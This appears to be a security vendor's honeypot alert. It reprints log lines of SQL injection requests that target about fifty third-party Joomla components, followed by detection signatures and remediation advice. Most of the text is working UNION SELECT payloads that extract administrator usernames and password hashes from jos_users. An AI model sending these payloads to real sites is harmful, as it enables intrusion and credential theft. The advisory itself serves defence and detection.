[Honeypot Alert] SQL Injection Scanning Targeting Joomla Plugins

The following SQL Injection attack payloads targeting Joomla components were identified in our web honeypot sensor logs. Every request below follows the same pattern: a numeric or quoted parameter is broken out of with a negative/bogus value and a `UNION SELECT` (sometimes case-mangled, e.g. `UnIon SelEct`, or preceded by `and 1=2`, to slip past naive filters) appended to pull `username` and `password` (the stored hash) from the `jos_users` table. The `concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)` wrapper decodes to `&&&%%%username:password%%%&&&` — a marker string the scanning tool can grep out of the response page — and its hex form, or the decoded `&&&%%%` delimiter in a response body, is a reliable signature for this campaign in your own logs. Note that `jos_` is the default Joomla 1.5 table prefix, and one payload filters on `gid=25`, which in Joomla 1.5 is the Super Administrator group; the scanner is after administrator credentials. All of these requests drew a `400` from the honeypot, which says nothing about how a real, vulnerable install would have responded.

91.213.96.32 - - [28/Nov/2012:11:31:04 +0100] "GET /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users) HTTP/1.1" 400 299 "-" "-"
92.38.226.14 - - [28/Nov/2012:11:31:42 +0100] "GET /index.php?option=com_spidercalendar&date=999999.9' union all select null,null,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,null+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.46.10 - - [28/Nov/2012:11:31:47 +0100] "GET /index.php?option=com_tag&task=tag&lang=es&tag=999999.9' union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:31:49 +0100] "GET /index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users),null-- HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:32:00 +0100] "GET /index.php?option=com_discussions&view=thread&catid=0&thread=1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:32:12 +0100] "GET /index.php?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),8,9 from jos_users--  HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:32:18 +0100] "GET /index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5 FROM jos_users HTTP/1.1" 400 299 "-" "-"
72.167.232.203 - - [28/Nov/2012:11:32:20 +0100] "GET /index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3 FROM jos_users HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:32:35 +0100] "GET /index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:32:37 +0100] "GET /index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
173.201.196.10 - - [28/Nov/2012:11:33:32 +0100] "GET /index.php?option=com_biblioteca&view=biblioteca&testo=-a%' UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
74.220.219.107 - - [28/Nov/2012:11:34:09 +0100] "GET /index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
70.38.64.238 - - [28/Nov/2012:11:34:12 +0100] "GET /index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
208.109.181.130 - - [28/Nov/2012:11:34:26 +0100] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
70.38.64.238 - - [28/Nov/2012:11:34:29 +0100] "GET /index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),10,11,12,13,14,15,16,17 FROM jos_users HTTP/1.1" 400 299 "-" "-"
208.109.181.130 - - [28/Nov/2012:11:37:07 +0100] "GET /index.php?option=com_listbingo&q=11111&catid=0&search_from_price=999 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),32,33,34,35,36,37 from `jos_users` -- '&search_to_price=2&search=Search&task=ads.search HTTP/1.1" 400 299 "-" "-"
70.38.64.238 - - [28/Nov/2012:11:37:08 +0100] "GET /index.php?option=com_answers&task=detail&id=-1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4,5,6,7,8,9 from jos_users where gid=25 limit 1 -- ' HTTP/1.1" 400 299 "-" "-"
67.205.46.10 - - [28/Nov/2012:11:37:58 +0100] "GET /index.php?option=com_event&task=details&sid=-61 union select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"
98.130.2.75 - - [28/Nov/2012:11:39:33 +0100] "GET /index.php?option=com_jdrugstopics&view=drugsdetails&id=-226 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13 from jos_users-- HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:40:50 +0100] "GET /index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users HTTP/1.1" 400 299 "-" "-"
111.223.32.119 - - [28/Nov/2012:11:43:38 +0100] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),11,12,13,14,15,16 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
111.223.32.119 - - [28/Nov/2012:11:43:39 +0100] "GET /index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
173.239.26.52 - - [28/Nov/2012:11:43:59 +0100] "GET /index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,unhex(hex(concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 FROM jos_users/* HTTP/1.1" 400 299 "-" "-"
184.168.152.10 - - [28/Nov/2012:11:44:03 +0100] "GET /index.php?option=com_news&id=-148+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
208.109.14.76 - - [28/Nov/2012:11:45:19 +0100] "GET /index.php?option=com_catalogproduction&task=viewdetail&id=-9999 union all select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:46:34 +0100] "GET /index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users&task=pay_options&Itemid=138 HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:47:19 +0100] "GET /index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
74.220.219.107 - - [28/Nov/2012:11:47:24 +0100] "GET /index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
70.38.64.238 - - [28/Nov/2012:11:47:25 +0100] "GET /index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
62.112.195.221 - - [28/Nov/2012:11:48:07 +0100] "GET /index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
208.109.14.76 - - [28/Nov/2012:11:48:49 +0100] "GET /index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
117.20.1.78 - - [28/Nov/2012:11:49:00 +0100] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
92.38.226.14 - - [28/Nov/2012:11:49:14 +0100] "GET /index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
117.20.1.78 - - [28/Nov/2012:11:49:21 +0100] "GET /index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
173.201.196.10 - - [28/Nov/2012:11:49:43 +0100] "GET /index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
111.223.32.119 - - [28/Nov/2012:11:49:47 +0100] "GET /index.php?option=com_departments&id=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
92.38.226.14 - - [28/Nov/2012:11:49:50 +0100] "GET /index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.46.10 - - [28/Nov/2012:11:49:52 +0100] "GET /index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
91.213.96.32 - - [28/Nov/2012:11:50:35 +0100] "GET /index.php?option=com_television&view=television&id=-1 UNION SELECT 1,2,3,4,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
91.213.96.32 - - [28/Nov/2012:11:51:03 +0100] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
67.205.52.169 - - [28/Nov/2012:11:51:14 +0100] "GET /index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users-- HTTP/1.1" 400 299 "-" "-"
111.223.32.119 - - [28/Nov/2012:11:51:20 +0100] "GET /index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:51:30 +0100] "GET /index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"
92.38.226.14 - - [28/Nov/2012:11:51:34 +0100] "GET /index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
178.208.83.27 - - [28/Nov/2012:11:51:36 +0100] "GET /index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8+from+jos_users&op=category_details HTTP/1.1" 400 299 "-" "-"
208.109.181.130 - - [28/Nov/2012:11:51:56 +0100] "GET /index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:52:47 +0100] "GET /index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4+from+jos_users-- HTTP/1.1" 400 299 "-" "-"
111.223.32.119 - - [28/Nov/2012:11:52:55 +0100] "GET /index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users HTTP/1.1" 400 299 "-" "-"
173.236.153.214 - - [28/Nov/2012:11:53:38 +0100] "GET /index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users-- HTTP/1.1" 400 299 "-" "-"
184.168.152.11 - - [28/Nov/2012:11:54:53 +0100] "GET /index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"

Here is a listing of the Joomla components (third-party `com_*` extensions) probed by this scan — fifty distinct components in roughly 25 minutes, from some seventeen different source addresses. The source-IP spread suggests the scanning is distributed rather than a single host, so blocking individual addresses is unlikely to help much; if any of these components is installed on your site, grep your access logs for `option=<component>` together with `jos_users` or the `0x26,0x26,0x26,0x25,0x25,0x25` marker:

com_about, com_amblog, com_answers, com_b2portfolio, com_biblioteca, com_bidding, com_book, com_bookjoomlas, com_brightweblinks, com_business, com_catalogproduction, com_commedia, com_departments, com_discussions, com_dtregister, com_equotes, com_event, com_expshop, com_flashmagazinedeluxe, com_gameq, com_hdvideoshare, com_include, com_jabode, com_jdrugstopics, com_joomgalaxy, com_joomladate, com_joomloc, com_jscalendar, com_leader, com_listbingo, com_netinvoice, com_news, com_nfnaddressbook, com_people, com_productbook, com_products, com_question, com_radio, com_rapidrecipe, com_simpleshop, com_spidercalendar, com_tag, com_television, com_timetrack, com_ttvideo, com_versioning, com_videos, com_yanc, com_yellowpages

If you are running Joomla, it is highly recommended that you install the most up-to-date versions of any of these components from the Joomla extension site so that you are not running an outdated, injectable release. Several of the components on this list are older third-party extensions that may no longer be maintained; for those, the only reliable fix is to uninstall them (disabling in the admin UI is not enough — the component's PHP entry point remains reachable via `index.php?option=com_...`). Changing the default `jos_` table prefix only breaks this particular payload, not the underlying injection, so do not treat it as a mitigation. Finally, if your logs show one of these requests answered with a `200` rather than an error, assume the `jos_users` table — including administrator password hashes — has been read: reset all administrator passwords and review the site for subsequently added accounts or uploaded files.

ModSecurity Commercial Rules

The SpiderLabs Commercial ModSecurity Rules Feed includes more than 400 virtual patches for Joomla component vulnerabilities. Virtual patching at the WAF layer buys time and catches opportunistic scans like the one above, but it is a stop-gap: the vulnerable component still needs to be updated or removed.
